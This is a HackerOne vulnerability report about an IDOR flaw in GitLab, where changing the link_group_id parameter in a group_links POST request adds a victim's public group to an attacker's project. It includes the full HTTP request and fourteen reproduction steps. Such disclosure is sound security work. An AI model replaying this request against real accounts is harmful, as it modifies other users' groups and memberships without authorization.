Add public/internal groups as members to your Project(IDOR)
HackerOne report #441097 by vijay_kumar1110 on 2018-11-15:
##Description : In your Private or Public Projects you can add new members and groups where you have access. Either you should high role member or owner of the these groups then only you are able to Add those groups and members into your project. Adding Groups to project request is vulnerable to IDOR attack where changing the Group_ID to public Group ID leads to add your project into all the members of the public group.
##Vulnerable Request :
POST /1110vijaykumar0007/testpersonalproject/group_links HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/1110vijaykumar0007/testpersonalproject/project_members
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close
Cookie: [Cookies]
utf8=%E2%9C%93&authenticity_token=&link_group_id=[group_ID]&link_group_access=30&expires_at=
Vulnerable parameter : link_group_id = Any public Group ID
Steps To Reproduce:
1.Create a victim account.(Ex : Victim account ,ID=12345).
2.Create a New public Group.(Ex:Victim group,ID=12345)
3.You can add few members to verify the issue properly.
4.Now Login from Attacker account.
5.Create new Public/private project and go to settings -- > member section.
6.For testing create a group here.(attacker group).
7.Here you can see that you are able to add groups into your project.
8.Now search for project and you will notice that you are only able to add your own group.
9.Add group and intercept the request. It will look something like above mentioned Request.
10.Change the link_group_id to Victim group ID and send the request to server.
11.Now you will notice that this group will be added to your project.
12.To verify this go to Victim account and go to your projects.
13.You will see that the project will added.
14.You can also verify it by all other members that were added into victim group.
Supporting Material/References:
Let me know if you require one.
Impact
Add public group and members to your public/private Project(IDOR)